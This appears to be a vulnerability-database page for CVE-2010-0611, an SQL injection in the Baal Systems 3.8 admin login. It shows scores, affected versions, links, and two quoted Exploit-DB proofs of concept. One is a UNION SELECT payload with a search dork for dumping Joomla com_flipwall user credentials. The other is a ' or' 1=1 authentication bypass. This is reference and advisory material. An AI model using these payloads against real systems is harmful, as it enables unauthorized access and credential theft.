CVE-2010-0611
published 2010-02-11CVE-2010-0611: Multiple SQL injection vulnerabilities in adminlogin.php in Baal Systems 3.8 and earlier allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
Multiple SQL injection vulnerabilities in adminlogin.php in Baal Systems 3.8 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| baalsystems | baal_systems | <= 3.8 | — |
| baalsystems | baal_systems | — | — |
| baalsystems | baal_systems | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Pulse Infotech Flip Wall - SQL Injection
exploitdb·2010-10-31
CVE-2010-4268 Joomla! Component Pulse Infotech Flip Wall - SQL Injection
Joomla! Component Pulse Infotech Flip Wall - SQL Injection
---
Joomla Component com_flipwall SQL Injection Vulnerability
# Author : Fl0riX ~ Bug Researchers
# Name : Joomla com_flipwall
# Bug Type : SQL injection
# Dork: "com_flipwall"
# Infection : Admin Login Bilgileri Alinabilir.
# Demo Vuln :
[+]http://0611.info/index.php?option=com_flipwall&controller=flipwall&catid=[EXPLOIT]
[+] Vendor:http://www.pulseextensions.com/
# Note: AsDemo Sitede Filtre Var Haberiniz olsun :)
# Bug Fix Advice : Zararli Karak terler Filtrenmelidir.
#############################################################
EXPLOIT :
null+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--
Exploit-DB
Baal Systems 3.8 - Authentication Bypass
exploitdb·2010-02-07
CVE-2010-0611 Baal Systems 3.8 - Authentication Bypass
Baal Systems 3.8 - Authentication Bypass
---
[+] Baal Systems
[+] Vuln Code :
[adminlogin.php]
[+] PoC :
[BaalSystems_path]/adminlogin.php
username: ' or' 1=1
Password: ' or' 1=1
No writeups or analysis indexed.
http://packetstormsecurity.org/1002-exploits/baalsystems-sql.txthttp://www.exploit-db.com/exploits/11346http://www.securityfocus.com/bid/38139https://exchange.xforce.ibmcloud.com/vulnerabilities/56147http://packetstormsecurity.org/1002-exploits/baalsystems-sql.txthttp://www.exploit-db.com/exploits/11346http://www.securityfocus.com/bid/38139https://exchange.xforce.ibmcloud.com/vulnerabilities/56147
2010-02-11
Published